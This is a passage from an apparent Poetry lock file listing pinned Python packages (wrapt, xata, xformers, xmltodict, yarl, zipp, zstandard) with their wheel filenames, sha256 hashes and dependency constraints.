{file = "wrapt-1.15.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d6bcbfc99f55655c3d93feb7ef3800bd5bbe963a755687cbf1f490a71fb7794b"},
{file = "wrapt-1.15.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c99f4309f5145b93eca6e35ac1a988f0dc0a7ccf9ccdcd78d3c0adf57224e62f"},
{file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b130fe77361d6771ecf5a219d8e0817d61b236b7d8b37cc045172e574ed219e6"},
{file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:96177eb5645b1c6985f5c11d03fc2dbda9ad24ec0f3a46dcce91445747e15094"},
{file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d5fe3e099cf07d0fb5a1e23d399e5d4d1ca3e6dfcbe5c8570ccff3e9208274f7"},
{file = "wrapt-1.15.0-cp38-cp38-win32.whl", hash = "sha256:abd8f36c99512755b8456047b7be10372fca271bf1467a1caa88db991e7c421b"},
{file = "wrapt-1.15.0-cp38-cp38-win_amd64.whl", hash = "sha256:b06fa97478a5f478fb05e1980980a7cdf2712015493b44d0c87606c1513ed5b1"},
{file = "wrapt-1.15.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2e51de54d4fb8fb50d6ee8327f9828306a959ae394d3e01a1ba8b2f937747d86"},
{file = "wrapt-1.15.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0970ddb69bba00670e58955f8019bec4a42d1785db3faa043c33d81de2bf843c"},
{file = "wrapt-1.15.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:76407ab327158c510f44ded207e2f76b657303e17cb7a572ffe2f5a8a48aa04d"},
{file = "wrapt-1.15.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:cd525e0e52a5ff16653a3fc9e3dd827981917d34996600bbc34c05d048ca35cc"},
{file = "wrapt-1.15.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d37ac69edc5614b90516807de32d08cb8e7b12260a285ee330955604ed9dd29"},
{file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:078e2a1a86544e644a68422f881c48b84fef6d18f8c7a957ffd3f2e0a74a0d4a"},
{file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:2cf56d0e237280baed46f0b5316661da892565ff58309d4d2ed7dba763d984b8"},
{file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:7dc0713bf81287a00516ef43137273b23ee414fe41a3c14be10dd95ed98a2df9"},
{file = "wrapt-1.15.0-cp39-cp39-win32.whl", hash = "sha256:46ed616d5fb42f98630ed70c3529541408166c22cdfd4540b88d5f21006b0eff"},
{file = "wrapt-1.15.0-cp39-cp39-win_amd64.whl", hash = "sha256:eef4d64c650f33347c1f9266fa5ae001440b232ad9b98f1f43dfe7a79435c0a6"},
{file = "wrapt-1.15.0-py3-none-any.whl", hash = "sha256:64b1df0f83706b4ef4cfb4fb0e4c2669100fd7ecacfb59e091fad300d4e04640"},
{file = "wrapt-1.15.0.tar.gz", hash = "sha256:d06730c6aed78cee4126234cf2d071e01b44b915e725a6cb439a879ec9754a3a"},
]
[[package]]
name = "xata"
version = "1.2.0"
description = "Python SDK for Xata.io"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "xata-1.2.0-py3-none-any.whl", hash = "sha256:a3710a273c0b64464080e332e24a1754a7fc9076a4117af558353c57f25c23e1"},
{file = "xata-1.2.0.tar.gz", hash = "sha256:048bf24c8aa3d09241dbe9f2a31513ce62c75c06ea3aa5822f000d2eac116462"},
]
[package.dependencies]
deprecation = ">=2.1.0,<3.0.0"
orjson = ">=3.8.1,<4.0.0"
python-dotenv = ">=0.21,<2.0"
requests = ">=2.28.1,<3.0.0"
[[package]]
name = "xformers"
version = "0.0.16"
description = "XFormers: A collection of composable Transformer building blocks."
optional = true
python-versions = ">=3.7"
files = [
{file = "xformers-0.0.16-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:a64a77663258b696bef3986488cd7df4f35e320355a7fe0bf86e8eff41726f0e"},
{file = "xformers-0.0.16-cp310-cp310-win_amd64.whl", hash = "sha256:302294fa8ae34c2a4602fd13ef7aceb71111e02b4e373c6366580a5159fec8e8"},
{file = "xformers-0.0.16-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:4f4ff62e7a8d66d6ab96c70f7f6c75e0e48a22e0484cf03b4506312c5e6e1806"},
{file = "xformers-0.0.16-cp37-cp37m-win_amd64.whl", hash = "sha256:e7263225564593abfbdfa3638fa3171be7214787bf47c5f476beb48369353d78"},
{file = "xformers-0.0.16-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:a8b34e99b7cd6928a446bb02fd54665bfe8e7c3ec796c41a739b656e7c5f2473"},
{file = "xformers-0.0.16-cp38-cp38-win_amd64.whl", hash = "sha256:07efbf5188fb1ef05cd16c93e4a6d9ac4992a1e5296fd432aeeb151ea24b40d0"},
{file = "xformers-0.0.16-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:d1538e14fe7759ddc3c7a51c94a4d7a9395d63e7b9baa5e14f1d4c0b04242c12"},
{file = "xformers-0.0.16-cp39-cp39-win_amd64.whl", hash = "sha256:ca67b6f25de878e4c816849cc7e6fa46bb675a429f151b1b66e4b10769ba7173"},
{file = "xformers-0.0.16.tar.gz", hash = "sha256:92c7f0556a68f4486492691b3f567140ee192b563d904185b6669b1f8bb8ae53"},
]
[package.dependencies]
numpy = "*"
pyre-extensions = "0.0.23"
torch = "1.13.1"
[[package]]
name = "xmltodict"
version = "0.13.0"
description = "Makes working with XML feel like you are working with JSON"
optional = true
python-versions = ">=3.4"
files = [
{file = "xmltodict-0.13.0-py2.py3-none-any.whl", hash = "sha256:aa89e8fd76320154a40d19a0df04a4695fb9dc5ba977cbb68ab3e4eb225e7852"},
{file = "xmltodict-0.13.0.tar.gz", hash = "sha256:341595a488e3e01a85a9d8911d8912fd922ede5fecc4dce437eb4b6c8d037e56"},
]
[[package]]
name = "yarl"
version = "1.9.2"
description = "Yet another URL library"
optional = false
python-versions = ">=3.7"
files = [
{file = "yarl-1.9.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8c2ad583743d16ddbdf6bb14b5cd76bf43b0d0006e918809d5d4ddf7bde8dd82"},
{file = "yarl-1.9.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:82aa6264b36c50acfb2424ad5ca537a2060ab6de158a5bd2a72a032cc75b9eb8"},
{file = "yarl-1.9.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c0c77533b5ed4bcc38e943178ccae29b9bcf48ffd1063f5821192f23a1bd27b9"},
{file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ee4afac41415d52d53a9833ebae7e32b344be72835bbb589018c9e938045a560"},
{file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9bf345c3a4f5ba7f766430f97f9cc1320786f19584acc7086491f45524a551ac"},
{file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2a96c19c52ff442a808c105901d0bdfd2e28575b3d5f82e2f5fd67e20dc5f4ea"},
{file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:891c0e3ec5ec881541f6c5113d8df0315ce5440e244a716b95f2525b7b9f3608"},
{file = "yarl-1.9.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c3a53ba34a636a256d767c086ceb111358876e1fb6b50dfc4d3f4951d40133d5"},
{file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:566185e8ebc0898b11f8026447eacd02e46226716229cea8db37496c8cdd26e0"},
{file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:2b0738fb871812722a0ac2154be1f049c6223b9f6f22eec352996b69775b36d4"},
{file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:32f1d071b3f362c80f1a7d322bfd7b2d11e33d2adf395cc1dd4df36c9c243095"},
{file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:e9fdc7ac0d42bc3ea78818557fab03af6181e076a2944f43c38684b4b6bed8e3"},
{file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:56ff08ab5df8429901ebdc5d15941b59f6253393cb5da07b4170beefcf1b2528"},
{file = "yarl-1.9.2-cp310-cp310-win32.whl", hash = "sha256:8ea48e0a2f931064469bdabca50c2f578b565fc446f302a79ba6cc0ee7f384d3"},
{file = "yarl-1.9.2-cp310-cp310-win_amd64.whl", hash = "sha256:50f33040f3836e912ed16d212f6cc1efb3231a8a60526a407aeb66c1c1956dde"},
{file = "yarl-1.9.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:646d663eb2232d7909e6601f1a9107e66f9791f290a1b3dc7057818fe44fc2b6"},
{file = "yarl-1.9.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aff634b15beff8902d1f918012fc2a42e0dbae6f469fce134c8a0dc51ca423bb"},
{file = "yarl-1.9.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a83503934c6273806aed765035716216cc9ab4e0364f7f066227e1aaea90b8d0"},
{file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b25322201585c69abc7b0e89e72790469f7dad90d26754717f3310bfe30331c2"},
{file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:22a94666751778629f1ec4280b08eb11815783c63f52092a5953faf73be24191"},
{file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8ec53a0ea2a80c5cd1ab397925f94bff59222aa3cf9c6da938ce05c9ec20428d"},
{file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:159d81f22d7a43e6eabc36d7194cb53f2f15f498dbbfa8edc8a3239350f59fe7"},
{file = "yarl-1.9.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:832b7e711027c114d79dffb92576acd1bd2decc467dec60e1cac96912602d0e6"},
{file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:95d2ecefbcf4e744ea952d073c6922e72ee650ffc79028eb1e320e732898d7e8"},
{file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:d4e2c6d555e77b37288eaf45b8f60f0737c9efa3452c6c44626a5455aeb250b9"},
{file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:783185c75c12a017cc345015ea359cc801c3b29a2966c2655cd12b233bf5a2be"},
{file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:b8cc1863402472f16c600e3e93d542b7e7542a540f95c30afd472e8e549fc3f7"},
{file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:822b30a0f22e588b32d3120f6d41e4ed021806418b4c9f0bc3048b8c8cb3f92a"},
{file = "yarl-1.9.2-cp311-cp311-win32.whl", hash = "sha256:a60347f234c2212a9f0361955007fcf4033a75bf600a33c88a0a8e91af77c0e8"},
{file = "yarl-1.9.2-cp311-cp311-win_amd64.whl", hash = "sha256:be6b3fdec5c62f2a67cb3f8c6dbf56bbf3f61c0f046f84645cd1ca73532ea051"},
{file = "yarl-1.9.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38a3928ae37558bc1b559f67410df446d1fbfa87318b124bf5032c31e3447b74"},
{file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ac9bb4c5ce3975aeac288cfcb5061ce60e0d14d92209e780c93954076c7c4367"},
{file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3da8a678ca8b96c8606bbb8bfacd99a12ad5dd288bc6f7979baddd62f71c63ef"},
{file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:13414591ff516e04fcdee8dc051c13fd3db13b673c7a4cb1350e6b2ad9639ad3"},
{file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bf74d08542c3a9ea97bb8f343d4fcbd4d8f91bba5ec9d5d7f792dbe727f88938"},
{file = "yarl-1.9.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6e7221580dc1db478464cfeef9b03b95c5852cc22894e418562997df0d074ccc"},
{file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:494053246b119b041960ddcd20fd76224149cfea8ed8777b687358727911dd33"},
{file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:52a25809fcbecfc63ac9ba0c0fb586f90837f5425edfd1ec9f3372b119585e45"},
{file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:e65610c5792870d45d7b68c677681376fcf9cc1c289f23e8e8b39c1485384185"},
{file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:1b1bba902cba32cdec51fca038fd53f8beee88b77efc373968d1ed021024cc04"},
{file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:662e6016409828ee910f5d9602a2729a8a57d74b163c89a837de3fea050c7582"},
{file = "yarl-1.9.2-cp37-cp37m-win32.whl", hash = "sha256:f364d3480bffd3aa566e886587eaca7c8c04d74f6e8933f3f2c996b7f09bee1b"},
{file = "yarl-1.9.2-cp37-cp37m-win_amd64.whl", hash = "sha256:6a5883464143ab3ae9ba68daae8e7c5c95b969462bbe42e2464d60e7e2698368"},
{file = "yarl-1.9.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5610f80cf43b6202e2c33ba3ec2ee0a2884f8f423c8f4f62906731d876ef4fac"},
{file = "yarl-1.9.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b9a4e67ad7b646cd6f0938c7ebfd60e481b7410f574c560e455e938d2da8e0f4"},
{file = "yarl-1.9.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:83fcc480d7549ccebe9415d96d9263e2d4226798c37ebd18c930fce43dfb9574"},
{file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5fcd436ea16fee7d4207c045b1e340020e58a2597301cfbcfdbe5abd2356c2fb"},
{file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:84e0b1599334b1e1478db01b756e55937d4614f8654311eb26012091be109d59"},
{file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3458a24e4ea3fd8930e934c129b676c27452e4ebda80fbe47b56d8c6c7a63a9e"},
{file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:838162460b3a08987546e881a2bfa573960bb559dfa739e7800ceeec92e64417"},
{file = "yarl-1.9.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f4e2d08f07a3d7d3e12549052eb5ad3eab1c349c53ac51c209a0e5991bbada78"},
{file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:de119f56f3c5f0e2fb4dee508531a32b069a5f2c6e827b272d1e0ff5ac040333"},
{file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:149ddea5abf329752ea5051b61bd6c1d979e13fbf122d3a1f9f0c8be6cb6f63c"},
{file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:674ca19cbee4a82c9f54e0d1eee28116e63bc6fd1e96c43031d11cbab8b2afd5"},
{file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:9b3152f2f5677b997ae6c804b73da05a39daa6a9e85a512e0e6823d81cdad7cc"},
{file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:5415d5a4b080dc9612b1b63cba008db84e908b95848369aa1da3686ae27b6d2b"},
{file = "yarl-1.9.2-cp38-cp38-win32.whl", hash = "sha256:f7a3d8146575e08c29ed1cd287068e6d02f1c7bdff8970db96683b9591b86ee7"},
{file = "yarl-1.9.2-cp38-cp38-win_amd64.whl", hash = "sha256:63c48f6cef34e6319a74c727376e95626f84ea091f92c0250a98e53e62c77c72"},
{file = "yarl-1.9.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:75df5ef94c3fdc393c6b19d80e6ef1ecc9ae2f4263c09cacb178d871c02a5ba9"},
{file = "yarl-1.9.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c027a6e96ef77d401d8d5a5c8d6bc478e8042f1e448272e8d9752cb0aff8b5c8"},
{file = "yarl-1.9.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f3b078dbe227f79be488ffcfc7a9edb3409d018e0952cf13f15fd6512847f3f7"},
{file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:59723a029760079b7d991a401386390c4be5bfec1e7dd83e25a6a0881859e716"},
{file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b03917871bf859a81ccb180c9a2e6c1e04d2f6a51d953e6a5cdd70c93d4e5a2a"},
{file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c1012fa63eb6c032f3ce5d2171c267992ae0c00b9e164efe4d73db818465fac3"},
{file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a74dcbfe780e62f4b5a062714576f16c2f3493a0394e555ab141bf0d746bb955"},
{file = "yarl-1.9.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8c56986609b057b4839968ba901944af91b8e92f1725d1a2d77cbac6972b9ed1"},
{file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:2c315df3293cd521033533d242d15eab26583360b58f7ee5d9565f15fee1bef4"},
{file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:b7232f8dfbd225d57340e441d8caf8652a6acd06b389ea2d3222b8bc89cbfca6"},
{file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:53338749febd28935d55b41bf0bcc79d634881195a39f6b2f767870b72514caf"},
{file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:066c163aec9d3d073dc9ffe5dd3ad05069bcb03fcaab8d221290ba99f9f69ee3"},
{file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8288d7cd28f8119b07dd49b7230d6b4562f9b61ee9a4ab02221060d21136be80"},
{file = "yarl-1.9.2-cp39-cp39-win32.whl", hash = "sha256:b124e2a6d223b65ba8768d5706d103280914d61f5cae3afbc50fc3dfcc016623"},
{file = "yarl-1.9.2-cp39-cp39-win_amd64.whl", hash = "sha256:61016e7d582bc46a5378ffdd02cd0314fb8ba52f40f9cf4d9a5e7dbef88dee18"},
{file = "yarl-1.9.2.tar.gz", hash = "sha256:04ab9d4b9f587c06d801c2abfe9317b77cdf996c65a90d5e84ecc45010823571"},
]
[package.dependencies]
idna = ">=2.0"
multidict = ">=4.0"
[[package]]
name = "zipp"
version = "3.17.0"
description = "Backport of pathlib-compatible object wrapper for zip files"
optional = false
python-versions = ">=3.8"
files = [
{file = "zipp-3.17.0-py3-none-any.whl", hash = "sha256:0e923e726174922dce09c53c59ad483ff7bbb8e572e00c7f7c46b88556409f31"},
{file = "zipp-3.17.0.tar.gz", hash = "sha256:84e64a1c28cf7e91ed2078bb8cc8c259cb19b76942096c8d7b84947690cabaf0"},
]
[package.extras]
docs = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (<7.2.5)", "sphinx (>=3.5)", "sphinx-lint"]
testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-ignore-flaky", "pytest-mypy (>=0.9.1)", "pytest-ruff"]
[[package]]
name = "zstandard"
version = "0.21.0"
description = "Zstandard bindings for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "zstandard-0.21.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:649a67643257e3b2cff1c0a73130609679a5673bf389564bc6d4b164d822a7ce"},
{file = "zstandard-0.21.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:144a4fe4be2e747bf9c646deab212666e39048faa4372abb6a250dab0f347a29"},
{file = "zstandard-0.21.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b72060402524ab91e075881f6b6b3f37ab715663313030d0ce983da44960a86f"},
{file = "zstandard-0.21.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8257752b97134477fb4e413529edaa04fc0457361d304c1319573de00ba796b1"},
{file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:c053b7c4cbf71cc26808ed67ae955836232f7638444d709bfc302d3e499364fa"},
{file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2769730c13638e08b7a983b32cb67775650024632cd0476bf1ba0e6360f5ac7d"},
{file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:7d3bc4de588b987f3934ca79140e226785d7b5e47e31756761e48644a45a6766"},
{file = "zstandard-0.21.0-cp310-cp310-win32.whl", hash = "sha256:67829fdb82e7393ca68e543894cd0581a79243cc4ec74a836c305c70a5943f07"},
{file = "zstandard-0.21.0-cp310-cp310-win_amd64.whl", hash = "sha256:e6048a287f8d2d6e8bc67f6b42a766c61923641dd4022b7fd3f7439e17ba5a4d"},
{file = "zstandard-0.21.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7f2afab2c727b6a3d466faee6974a7dad0d9991241c498e7317e5ccf53dbc766"},
{file = "zstandard-0.21.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ff0852da2abe86326b20abae912d0367878dd0854b8931897d44cfeb18985472"},
{file = "zstandard-0.21.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d12fa383e315b62630bd407477d750ec96a0f438447d0e6e496ab67b8b451d39"},
{file = "zstandard-0.21.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f1b9703fe2e6b6811886c44052647df7c37478af1b4a1a9078585806f42e5b15"},
{file = "zstandard-0.21.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:df28aa5c241f59a7ab524f8ad8bb75d9a23f7ed9d501b0fed6d40ec3064784e8"},
{file = "zstandard-0.21.0-cp311-cp311-win32.whl", hash = "sha256:0aad6090ac164a9d237d096c8af241b8dcd015524ac6dbec1330092dba151657"},
{file = "zstandard-0.21.0-cp311-cp311-win_amd64.whl", hash = "sha256:48b6233b5c4cacb7afb0ee6b4f91820afbb6c0e3ae0fa10abbc20000acdf4f11"},
{file = "zstandard-0.21.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e7d560ce14fd209db6adacce8908244503a009c6c39eee0c10f138996cd66d3e"},
{file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1e6e131a4df2eb6f64961cea6f979cdff22d6e0d5516feb0d09492c8fd36f3bc"},
{file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e1e0c62a67ff425927898cf43da2cf6b852289ebcc2054514ea9bf121bec10a5"},
{file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:1545fb9cb93e043351d0cb2ee73fa0ab32e61298968667bb924aac166278c3fc"},
{file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fe6c821eb6870f81d73bf10e5deed80edcac1e63fbc40610e61f340723fd5f7c"},
{file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:ddb086ea3b915e50f6604be93f4f64f168d3fc3cef3585bb9a375d5834392d4f"},
{file = "zstandard-0.21.0-cp37-cp37m-win32.whl", hash = "sha256:57ac078ad7333c9db7a74804684099c4c77f98971c151cee18d17a12649bc25c"},
{file = "zstandard-0.21.0-cp37-cp37m-win_amd64.whl", hash = "sha256:1243b01fb7926a5a0417120c57d4c28b25a0200284af0525fddba812d575f605"},
{file = "zstandard-0.21.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ea68b1ba4f9678ac3d3e370d96442a6332d431e5050223626bdce748692226ea"},
{file = "zstandard-0.21.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8070c1cdb4587a8aa038638acda3bd97c43c59e1e31705f2766d5576b329e97c"},
{file = "zstandard-0.21.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4af612c96599b17e4930fe58bffd6514e6c25509d120f4eae6031b7595912f85"},
{file = "zstandard-0.21.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cff891e37b167bc477f35562cda1248acc115dbafbea4f3af54ec70821090965"},
{file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:a9fec02ce2b38e8b2e86079ff0b912445495e8ab0b137f9c0505f88ad0d61296"},
{file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0bdbe350691dec3078b187b8304e6a9c4d9db3eb2d50ab5b1d748533e746d099"},
{file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:b69cccd06a4a0a1d9fb3ec9a97600055cf03030ed7048d4bcb88c574f7895773"},
{file = "zstandard-0.21.0-cp38-cp38-win32.whl", hash = "sha256:9980489f066a391c5572bc7dc471e903fb134e0b0001ea9b1d3eff85af0a6f1b"},
{file = "zstandard-0.21.0-cp38-cp38-win_amd64.whl", hash = "sha256:0e1e94a9d9e35dc04bf90055e914077c80b1e0c15454cc5419e82529d3e70728"},
{file = "zstandard-0.21.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d2d61675b2a73edcef5e327e38eb62bdfc89009960f0e3991eae5cc3d54718de"},
{file = "zstandard-0.21.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25fbfef672ad798afab12e8fd204d122fca3bc8e2dcb0a2ba73bf0a0ac0f5f07"},
{file = "zstandard-0.21.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62957069a7c2626ae80023998757e27bd28d933b165c487ab6f83ad3337f773d"},
{file = "zstandard-0.21.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:14e10ed461e4807471075d4b7a2af51f5234c8f1e2a0c1d37d5ca49aaaad49e8"},
{file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:9cff89a036c639a6a9299bf19e16bfb9ac7def9a7634c52c257166db09d950e7"},
{file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:52b2b5e3e7670bd25835e0e0730a236f2b0df87672d99d3bf4bf87248aa659fb"},
